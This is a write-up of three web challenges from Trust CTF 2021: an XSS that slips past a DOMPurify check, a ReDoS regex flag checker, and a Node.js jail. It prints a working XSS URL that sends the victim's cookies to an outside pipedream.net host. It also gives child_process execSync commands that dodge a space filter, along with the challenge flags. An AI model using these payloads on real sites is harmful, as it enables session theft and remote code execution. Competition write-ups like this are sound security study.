Trust CTF 2021 Write Up

Today, Dimigo’s team called Trust hosted the CTF. I couldn’t participate in the morning because I had personal work to do, and I did a little bit in the afternoon.


(Web) babyxss [270 pts]

The babyxss challenge is a simple XSS challenge disguised as DOMPurify Bypass.

1
2
3
4
5
6
7
8
9
10
11
12
13
<?php
require_once("secrets.php");
# This Challenge using newest version DomPurify..! Maybe unexploitable!!

if(isset($_GET['name'])) {
header("content-security-policy: base-uri 'self'; block-all-mixed-content; connect-src 'self';");
header('X-Frame-Options: DENY');
echo "<h1 id='name'>Hello </h1>";
echo '<script src="https://code.jquery.com/jquery-3.5.1.min.js"integrity="sha256-9/aliU8dGd2tb6OSsuzixeV4y/faTqgFtohetphbbj0=" crossorigin="anonymous"></script>';
echo "<script type='text/javascript' src='https://cure53.de/purify.js'></script><script>var name='". base64_encode($_GET['name']) ."';document.getElementById('name').innerHTML += DOMPurify.sanitize($('<p>').html(atob(name)).text())</script>";
}

show_source(__FILE__);

When accessing the challenge, the code above appears. CSP is also set, and below, DOMPurify is used to respond to XSS. So I just inserted something DOMPurify Bypass Payload and it was triggered, so I hijacked the cookie and got the flag.

But the reason it was triggered wasn’t because it bypassed DOMPurify. Since DOMPurify is using the latest version, it was impossible to bypass it.

1
$('<p>').html(atob(name)).text()

However, you can see that the above code is passed as an argument to the sanitize() method. It goes into the DOM for a while right there, and that’s when XSS is triggered. So you can trigger an XSS using a normal payload.

1
https://xss.trustctf.xyz/?name=%3Csvg%3E%3C/p%3E%3Cstyle%3E%3Ca%20id=%22%3C/style%3E%3Cimg%20src=1%20onerror=location.href=%27https://79a9bb50560aa2c77156e03b431dc2b3.m.pipedream.net/?f=%27.concat(document.cookie)%3E%22%3E
1
FLAG : TRUST{cf909172b91c8bf3f70c0e71f2809f36}

(Web) FLAG Checker [1000 pts]

The FLAG Checker challenge is a simple ReDos challenge. I just studied the theory and tried it for the first time, but it seems to be just a strange technique.

1
2
3
4
5
6
7
8
9
10
11
12
Wrong.... <?php
include "./secret.php";
$result = preg_match("/{$_GET['flag']}/", $flag);
if ($flag === $_GET['answer'] && $result === 1) {
echo $flag;
}
else {
echo "Wrong....";
}

highlight_file(__FILE__);
?>

When I approach the problem, it comes up as above. I saw this problem a while ago, so I immediately thought of ReDos, and a flag came out when I abused it with that technique. I will not upload the code separately because a problem similar to that problem will be uploaded to webhacking.kr later.

1
FLAG : TRUST{2ef0c0b759425eed6d3932c109e0fe74}

(Web) nodejail (Not Solve) [400 pts]

The nodejail challenge is a simple RCE challenge.

When I approach the problem, I just see an input window. By entering the Javascript code, I was able to confirm that various characters were filtered.

1
require(`child_process`).execSync(`c?t${IFS}~~`).toString()

At the time of the competition, as above, ${IFS} was used to bypass the space. However, no matter how I tried as above, nothing happened to return only err, so I just gave up.

1
require(`fs`).readdirSync(`./`)

After the competition, when I asked Seungju, I was able to receive a code for searching for a directory using the fs module. When I saw the code above, I was so shocked. He thought he could only read and write files using the fs module, but it turned out to be the first time he knew that directories could be traversed.

1
require(`child_process`).execSync(`\x63at\x20T\x2a`).toString()

And the second time, I was curious about how Kyung-jun solved it, so when I asked him, he saw that he bypassed the space using hexadecimal numbers as above, and it was absurd..

1
FLAG : TRUST{th1s_1s_3xtrem3_n0d3_j41l}